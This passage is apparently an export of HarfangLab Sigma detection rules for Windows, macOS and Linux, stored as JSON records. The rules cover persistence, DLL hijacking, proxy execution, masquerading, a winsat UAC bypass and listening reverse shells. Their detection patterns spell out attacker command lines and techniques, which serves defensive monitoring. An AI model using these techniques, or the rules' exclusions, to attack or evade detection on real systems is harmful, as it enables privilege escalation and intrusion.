"sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093364Z", + "creation_date": "2026-03-23T11:45:34.093366Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093370Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1543/001/", + "https://attack.mitre.org/techniques/T1543/004/" + ], + "name": "t1543_001_launch_agents_created_plistbuddy.yml", + "content": "title: Launch Agent/Daemon Created via PlistBuddy\nid: 08393432-4fef-4e8b-aa5e-fc13131e09c3\ndescription: |\n Detects the creation of a launch agent or daemon using PlistBuddy.\n Adversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\n It is recommended to check the content of the newly created plist file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\ndate: 2024/06/18\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.t1543.004\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Tool.PlistBuddy\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - 
'/private/var/root/Library/LaunchAgents/'\n - '/Library/User Template/Library/LaunchAgents/'\n Kind: 'create'\n ProcessImage|endswith: '/PlistBuddy'\n\n condition: all of selection_*\nlevel: medium\n#level: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "08393432-4fef-4e8b-aa5e-fc13131e09c3", + "rule_name": "Launch Agent/Daemon Created via PlistBuddy", + "rule_description": "Detects the creation of a launch agent or daemon using PlistBuddy.\nAdversaries may build a plist from scratch using PlistBuddy in order to establish a means of persistence.\nIt is recommended to check the content of the newly created plist file for malicious content.\n", + "rule_creation_date": "2024-06-18", + "rule_modified_date": "2025-01-20", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1543.001", + "attack.t1543.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0850e834-f366-4ebb-a022-79bc7b74fc1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.069400Z", + 
"creation_date": "2026-03-23T11:45:34.069403Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.069410Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Libraries/Ieframe/", + "https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268", + "https://attack.mitre.org/techniques/T1218/011/" + ], + "name": "t1218_011_rundll32_ieframe_proxy_execution.yml", + "content": "title: Proxy Execution via ieframe.dll\nid: 0850e834-f366-4ebb-a022-79bc7b74fc1a\ndescription: |\n Detects a suspicious invocation of ieframe.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Ieframe/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ieframe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n\n selection_ieframe:\n ParentCommandLine|contains:\n - ' ieframe,'\n - ' ieframe.dll,'\n\n 
selection_function:\n ParentCommandLine|contains: 'OpenURL'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0850e834-f366-4ebb-a022-79bc7b74fc1a",
+ "rule_name": "Proxy Execution via ieframe.dll",
+ "rule_description": "Detects a suspicious invocation of ieframe.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling ieframe.dll's OpenURL function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
+ "rule_creation_date": "2025-10-17",
+ "rule_modified_date": "2025-10-30",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1216.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ 
"id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.589223Z",
+ "creation_date": "2026-03-23T11:45:34.589227Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.589234Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://github.com/xforcered/WFH",
+ "https://wietze.github.io/blog/save-the-environment-variables",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_sihclient.yml",
+ "content": "title: DLL Hijacking via sihclient.exe\nid: 085b257b-644f-4cc1-bc25-578447cf5bf2\ndescription: |\n Detects potential Windows DLL Hijacking via sihclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - 
classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sihclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\dnsapi.dll'\n - '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "085b257b-644f-4cc1-bc25-578447cf5bf2",
+ "rule_name": "DLL Hijacking via sihclient.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via sihclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.598454Z",
+ "creation_date": "2026-03-23T11:45:34.598457Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.598465Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1595/"
+ ],
+ "name": "t1595_wifi_scanning_airport_macos.yml",
+ "content": "title: Wi-Fi Networks Scanned via airport\nid: 0882e820-0755-4f74-94e4-b9ae77d3294d\ndescription: |\n Detects the execution of the airport command to scan nearby Wi-Fi networks.\n Attackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1595/\ndate: 2024/07/03\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|contains: '/airport'\n CommandLine|contains: ' -s'\n\n condition: 
selection\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0882e820-0755-4f74-94e4-b9ae77d3294d",
+ "rule_name": "Wi-Fi Networks Scanned via airport",
+ "rule_description": "Detects the execution of the airport command to scan nearby Wi-Fi networks.\nAttackers may use it during the discovery phase of an attack to search for unauthenticated Wi-Fi networks to connect to.\nIt is recommended to check for other suspicious activity by the parent process.\n",
+ "rule_creation_date": "2024-07-03",
+ "rule_modified_date": "2025-01-20",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [],
+ "rule_technique_tags": [
+ "attack.t1595"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.081044Z",
+ "creation_date": "2026-03-23T11:45:34.081047Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.081051Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ 
"https://attack.mitre.org/techniques/T1204/002/", + "https://attack.mitre.org/techniques/T1036/007/" + ], + "name": "t1036_007_executable_with_multiple_extension.yml", + "content": "title: PE with Multiple Extensions Executed\nid: 08c82317-1fb0-42b6-b3cc-cf85ace1deb8\ndescription: |\n Detects the execution of a suspicious executable with multiple extensions.\n Attackers can add multiple extensions to an executable file to lure users into double clicking on the file.\n Since Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\n It is recommended to analyze the executed file to determine whether its execution is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/007/\ndate: 2021/03/30\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '(?i)\\.(?:xlsx?|pptx?|docx?|pdf|zip|rar|7z|png|jpe?g|bmp|gif|psd|tiff)\\s{0,4}\\.exe$'\n\n exclusion_ranorex:\n Image|endswith: '\\Ranorex.PDF.exe'\n OriginalFileName: 'Ranorex.PDF.exe'\n InternalName: 'Ranorex.PDF.exe'\n\n exclusion_portablegit:\n Image|endswith: '\\PortableGit-*.7z.exe'\n Signature: 'Johannes Schindelin'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "08c82317-1fb0-42b6-b3cc-cf85ace1deb8", + "rule_name": "PE with Multiple Extensions Executed", + "rule_description": "Detects the execution of a suspicious executable 
with multiple extensions.\nAttackers can add multiple extensions to an executable file to lure users into double clicking on the file.\nSince Windows by default doesn't display the last extension, users will only be able to see the fake extension. This is done by attackers to masquerade the PE as a different file type, usually a document.\nIt is recommended to analyze the executed file to determine whether its execution is legitimate.\n", + "rule_creation_date": "2021-03-30", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1036.007", + "attack.t1204.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "08ddafaf-401d-4c3d-9389-e96925e90f0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.628428Z", + "creation_date": "2026-03-23T11:45:34.628430Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.628434Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://www.elastic.co/security-labs/inital-research-of-jokerspy", + "https://attack.mitre.org/techniques/T1204/002/", + "https://attack.mitre.org/techniques/T1564/001/" + ], + "name": "t1204_002_shared_folder_execution.yml", + "content": "title: File Executed from Users Shared Folder\nid: 08ddafaf-401d-4c3d-9389-e96925e90f0f\ndescription: |\n Detects the execution of a file from the Users shared folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://www.elastic.co/security-labs/inital-research-of-jokerspy\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|startswith: '/Users/shared/'\n GrandparentImage|contains: '?'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_relocated:\n Image|startswith: '/Users/Shared/Relocated Items/Security/Applications/'\n GrandparentImage:\n - '/sbin/launchd'\n - '/Users/Shared/Relocated Items/Security/Applications/*'\n\n exclusion_gimp:\n ProcessGrandparentImage: '/Users/Shared/Previously Relocated Items/Security/GIMP.app/Contents/MacOS/GIMP-bin'\n # todo: add signature\n\n exclusion_logioption:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.logi.optionsplus.*'\n\n exclusion_hotreload:\n ProcessGrandparentImage:\n - '/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/MacOS/HotReload'\n - 
'/Users/Shared/singularitygroup-hotreload/executables_*/HotReload.app/Contents/Resources/CodePatcherCLI'\n # todo: add signature\n\n exclusion_riotgames:\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (Renderer).app/Contents/MacOS/Riot Client Helper (Renderer)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper (GPU).app/Contents/MacOS/Riot Client Helper (GPU)'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Riot Client Helper.app/Contents/MacOS/Riot Client Helper'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Helpers/chrome_crashpad_handler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/Frameworks/Riot Client.app/Contents/MacOS/Riot Client'\n - Image: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientCrashHandler'\n ParentImage: '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - Image:\n - '/Users/Shared/Riot Games/Riot Client.app/Contents/MacOS/RiotClientServices'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/macos/riot client'\n - '/users/shared/riot games/riot client.app/contents/frameworks/riot client.app/contents/frameworks/riot client helper (renderer).app/contents/macos/riot client helper (renderer)'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.riotgames.RiotGames.*'\n\n exclusion_lghub:\n - ParentImage: '/Applications/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n - Image: '/Users/Shared/LGHUB/depots/*/core/lghub.app/Contents/MacOS/lghub_updater.app/Contents/MacOS/lghub_updater'\n 
exclusion_battlenet:\n Image: '/Users/Shared/Battle.net/Agent/Agent.app/Contents/MacOS/Switcher'\n\n exclusion_wizards:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.wizards.mtga'\n\n exclusion_maxon:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'net.maxon.maxonapp.installer'\n\n exclusion_gog:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.gog.galaxy.updater'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "08ddafaf-401d-4c3d-9389-e96925e90f0f", + "rule_name": "File Executed from Users Shared Folder", + "rule_description": "Detects the execution of a file from the Users shared folder.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n", + "rule_creation_date": "2024-05-10", + "rule_modified_date": "2025-09-24", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1204.002", + "attack.t1564.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "08e4776f-548a-4b01-8538-c2af435dce4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": 
"b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093473Z", + "creation_date": "2026-03-23T11:45:34.093475Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093479Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198" + ], + "name": "t1548_002_uac_bypass_winsat.yml", + "content": "title: UAC Bypass Executed via winsat.exe\nid: 08e4776f-548a-4b01-8538-c2af435dce4b\ndescription: |\n Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2025/01/31\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_prepare:\n 
CommandLine: '?:\\Windows\\System32\\cmd.exe /c wusa ?:\\Users\\\\*\\AppData\\Local\\Temp\\update.msu /extract:?:\\Windows\\system32\\sysprep\\'\n\n selection_exploit:\n CommandLine: '?:\\Windows\\system32\\sysprep\\winsat.exe'\n ProcessIntegrityLevel: 'High'\n ProcessParentIntegrityLevel: 'Medium'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "08e4776f-548a-4b01-8538-c2af435dce4b", + "rule_name": "UAC Bypass Executed via winsat.exe", + "rule_description": "Detects UAC bypass involving the hijacking of the devobj.dll or powrprof.dll DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer).\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n", + "rule_creation_date": "2025-01-31", + "rule_modified_date": "2025-01-31", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002", + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "08f3ae91-3811-4a4b-8f04-87302ca365c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": 
false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.612661Z", + "creation_date": "2026-03-23T11:45:34.612665Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612672Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1571/", + "https://attack.mitre.org/techniques/T1205/001/", + "https://attack.mitre.org/techniques/T1104/" + ], + "name": "t1571_process_listen_connections_suspicious_path.yml", + "content": "title: Process Started Listening for Incoming Connections from Suspicious Path\nid: 08f3ae91-3811-4a4b-8f04-87302ca365c9\ndescription: |\n Detects a process that starts listening for incoming connections from a suspicious path.\n Attackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\n It is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://attack.mitre.org/techniques/T1571/\n - https://attack.mitre.org/techniques/T1205/001/\n - https://attack.mitre.org/techniques/T1104/\ndate: 2023/12/15\nmodified: 2026/02/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1571\n - attack.t1104\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - classification.Linux.Source.NetworkListen\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: 
